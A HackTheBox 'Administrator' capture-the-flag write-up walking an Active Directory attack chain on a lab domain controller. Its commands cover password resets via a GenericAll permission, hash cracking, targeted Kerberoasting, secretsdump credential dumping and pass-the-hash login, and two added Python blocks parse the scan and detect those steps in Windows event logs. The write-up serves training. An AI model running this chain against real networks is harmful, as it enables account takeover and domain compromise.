
HackTheBox Administrator Writeup

Explore the fundamentals of cybersecurity in the University Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

Edit the /etc/hosts file and add the following entries:

10.10.11.42 administrator.htb

Script to add hosts automatically

# Append the host entry only if an identical line is not already present in /etc/hosts
ip="10.10.11.42"
domain="administrator.htb"
grep -qF "$ip $domain" /etc/hosts || echo "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV administrator.htb

Nmap scan report for administrator.htb (10.10.11.42)
Host is up (0.056s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-18 18:45:34Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time: 
|   date: 2024-11-18T18:45:39
|_  start_date: N/A
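Added example, not part of the original writeup: a small Python parser for the nmap report format shown above. It pulls out the open ports, converts the clock-skew value to signed seconds and compares it with the default Kerberos tolerance of five minutes, which is the reason the Kerberoasting step further down fails with KRB_AP_ERR_SKEW until the local clock is adjusted. The report it parses is a constructed excerpt in the same shape as the scan above; the function names and the KERBEROS_MAX_SKEW_SECONDS constant are my own.

```python
import re

# Windows Kerberos rejects requests whose timestamp differs from the KDC clock by
# more than the maximum tolerance; the default is 5 minutes.
KERBEROS_MAX_SKEW_SECONDS = 5 * 60

# Constructed excerpt in the shape of an `nmap -sCV` report (not the real scan).
SAMPLE_REPORT = """\
Nmap scan report for dc.example.test (192.0.2.10)
Host is up (0.056s latency).
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-18 18:45:34Z)
445/tcp  open  microsoft-ds?
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 6h59m59s
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# Handles both "clock-skew: 6h59m59s" and the multi-sample form "clock-skew: mean: 1m30s, ..."
SKEW_LINE = re.compile(r"clock-skew:\s*(?:mean:\s*)?(-?)(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?")


def parse_ports(report):
    """Return (port, proto, state, service, version) tuples for every port line."""
    ports = []
    for line in report.splitlines():
        match = PORT_LINE.match(line)
        if match:
            port, proto, state, service, version = match.groups()
            ports.append((int(port), proto, state, service, (version or "").strip()))
    return ports


def parse_clock_skew_seconds(report):
    """Convert nmap's clock-skew value (e.g. '6h59m59s' or '-1s') to signed seconds."""
    match = SKEW_LINE.search(report)
    if not match:
        return None
    sign, hours, minutes, seconds = match.groups()
    total = int(hours or 0) * 3600 + int(minutes or 0) * 60 + int(seconds or 0)
    return -total if sign else total


def assess(report):
    """Summarise the exposure a defender would want to look at on a domain controller."""
    ports = parse_ports(report)
    services = {service for _, _, state, service, _ in ports if state == "open"}
    skew = parse_clock_skew_seconds(report)
    return {
        "ftp_exposed": "ftp" in services,
        "kerberos_exposed": "kerberos-sec" in services,
        # 5985/5986 are the WinRM HTTP/HTTPS listeners
        "winrm_exposed": any(port in (5985, 5986) for port, _, state, _, _ in ports if state == "open"),
        "smb_signing_required": "Message signing enabled and required" in report,
        "clock_skew_seconds": skew,
        "skew_exceeds_kerberos_tolerance": skew is not None and abs(skew) > KERBEROS_MAX_SKEW_SECONDS,
    }


if __name__ == "__main__":
    for key, value in assess(SAMPLE_REPORT).items():
        print(f"{key}: {value}")
```

Run it on a saved scan with `assess(open("scan.txt").read())`. A skew of almost seven hours, as in the scan above, is a configuration finding in its own right: any Kerberos client on a correctly synchronised clock will be rejected by that DC, and the usual fix is to point the DC at a reliable time source rather than to shift client clocks.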

BloodHound Enumeration

Run BloodHound to collect Active Directory data:

bloodhound-python -c All -u Olivia -p 'ichliebedich' -d administrator.htb -ns 10.10.11.42 
  • After ingestion (see this tutorial), we find that Olivia has GenericAll permission over Michael.

Changing Passwords with BloodyAD

Change Michael’s Password

bloodyad --host "10.10.11.42" -d "Administrator.htb" -u "olivia" -p "ichliebedich" set password "michael" "Password@123"

Change Benjamin’s Password

bloodyad --host "10.10.11.42" -d "Administrator.htb" -u "michael" -p "Password@123" set password "benjamin" "Password@123"

Accessing FTP

Login to FTP using Benjamin’s credentials:

ftp 10.10.11.42
  • Username: benjamin
  • Password: Password@123

Download the backup file:

ls
get Backup.psafe3

Cracking the Password Safe File

Crack the password safe file:

hashcat -m 5200 -a 0 Backup.psafe3 /usr/share/dict/rockyou.txt
  • Cracked Password: tekieromucho

Install a Password Safe reader (e.g., PasswordSafe) to open Backup.psafe3 using the cracked password.

Extracted credentials:

  • alexander: UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
  • emily: UXLCI5iETUsIBoFVTj8yQFKoHjXmb
  • emma: WwANQWnmJnGV07WQN8bMS7FMAbjNur

Accessing the Machine via Evil-WinRM

Login as Emily:

evil-winrm -i 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

Retrieve the user flag:

cat \users\emily\Desktop\user.txt

Kerberoasting Attack

Attempt Kerberoasting:

targetedkerberoast -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

Encountered error:

[!] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

Fix the clock skew:

# Offset in whole seconds between the local clock and the DC, read from the "offset" field of ntpdate -q
serverskew=$(ntpdate -q administrator.htb | awk '{print $6}' | head -n 1 | tr -d '+,' | cut -d '.' -f 1)
# Run the tool under a faked clock shifted by that offset so the KDC accepts the authenticator timestamp
faketime "$(date -d "+$serverskew seconds" +"%Y-%m-%d %H:%M:%S")" targetedkerberoast -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

Save the hash to hash.txt.

Crack the hash:

hashcat hash.txt /usr/share/dict/rockyou.txt
  • Cracked Password: limpbizkit
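Added example, not part of the original writeup: detection logic for the two Active Directory steps this chain depends on, the password resets performed through the GenericAll edge (BloodyAD section above) and the Kerberoasting step just shown. It runs over a constructed list of Windows Security events in the field layout a SIEM would extract: event 4724 is "An attempt was made to reset an account's password" and event 4769 is a service ticket request, where TicketEncryptionType 0x17 means RC4-HMAC. The sample records, the AUTHORISED_RESETTERS allowlist and the function names are my own assumptions; the account names only mirror the writeup.

```python
"""Defender-side detection rules for GenericAll password resets (4724) and
Kerberoast-style service-ticket requests (4769 with RC4 encryption)."""

# Constructed sample events using the field names of the Windows Security log;
# the account names mirror the writeup but the records themselves are invented.
SAMPLE_EVENTS = [
    {"EventID": 4724, "SubjectUserName": "olivia", "TargetUserName": "michael"},
    {"EventID": 4724, "SubjectUserName": "michael", "TargetUserName": "benjamin"},
    {"EventID": 4724, "SubjectUserName": "svc_helpdesk", "TargetUserName": "jdoe"},
    {"EventID": 4769, "TargetUserName": "emily", "ServiceName": "ethan", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "emily", "ServiceName": "DC$", "TicketEncryptionType": "0x12"},
    {"EventID": 4769, "TargetUserName": "emily", "ServiceName": "krbtgt", "TicketEncryptionType": "0x17"},
]

# Assumption: the accounts allowed to reset other users' passwords (helpdesk
# automation, in this constructed scenario). Any other principal resetting a
# password is worth a look, since that is exactly what a GenericAll abuse looks like.
AUTHORISED_RESETTERS = {"svc_helpdesk"}

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC in event 4769


def suspicious_password_resets(events):
    """4724 events where an unexpected principal resets someone else's password."""
    hits = []
    for e in events:
        if e["EventID"] != 4724:
            continue
        subject, target = e["SubjectUserName"].lower(), e["TargetUserName"].lower()
        if subject != target and subject not in AUTHORISED_RESETTERS:
            hits.append(e)
    return hits


def kerberoast_indicators(events):
    """4769 events with an RC4 ticket for a user (non-machine, non-krbtgt) SPN.

    Tickets for user accounts are normally AES today, so an RC4 ticket for one
    stands out; machine accounts (trailing '$') and krbtgt are excluded because
    their tickets are not useful for offline cracking and would only add noise.
    """
    hits = []
    for e in events:
        if e["EventID"] != 4769:
            continue
        service = e["ServiceName"].lower()
        if (e["TicketEncryptionType"].lower() == RC4_HMAC
                and not service.endswith("$") and service != "krbtgt"):
            hits.append(e)
    return hits


def reset_chains(events):
    """Link resets where the target of one reset is the subject of another.

    Returns chains of three or more accounts ('a -> b -> c'); such hops are the
    signature of an ACL path being walked one account at a time.
    """
    next_hops = {}
    for e in events:
        if e["EventID"] == 4724:
            next_hops.setdefault(e["SubjectUserName"].lower(), []).append(e["TargetUserName"].lower())
    targets = {t for hops in next_hops.values() for t in hops}
    chains = []

    def walk(node, path):
        hops = [h for h in next_hops.get(node, []) if h not in path]  # skip cycles
        if not hops:
            if len(path) >= 3:
                chains.append(" -> ".join(path))
            return
        for hop in hops:
            walk(hop, path + [hop])

    for root in next_hops:
        if root not in targets:  # start only from accounts nobody reset
            walk(root, [root])
    return chains


if __name__ == "__main__":
    for e in suspicious_password_resets(SAMPLE_EVENTS):
        print("password reset:", e["SubjectUserName"], "->", e["TargetUserName"])
    for e in kerberoast_indicators(SAMPLE_EVENTS):
        print("RC4 service ticket for user SPN:", e["ServiceName"], "requested by", e["TargetUserName"])
    for chain in reset_chains(SAMPLE_EVENTS):
        print("reset chain:", chain)
```

The chain rule is the one that matters most here: a single reset by an unexpected account may be an admin doing their job, but two resets where the first target performs the second is the pattern of a path like Olivia to Michael to Benjamin being walked. On the prevention side, the underlying fix is to remove the GenericAll edge itself and to move service accounts such as ethan's to AES-only, long random passwords or group managed service accounts so that an RC4 ticket is neither issued nor crackable.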

Dumping Secrets with SecretsDump

Dump secrets using Ethan’s credentials:

secretsdump.py 'administrator.htb/ethan:limpbizkit'@'administrator.htb'

Gaining Administrator Access

Login as Administrator using the dumped NTLM hash:

evil-winrm -i 10.10.11.42 -u 'administrator' -H '3dc553ce4b9fd20bd016e098d2d2fd2e'

Retrieve the root flag:

type \users\administrator\desktop\root.txt

This post is licensed under CC BY 4.0 by the author.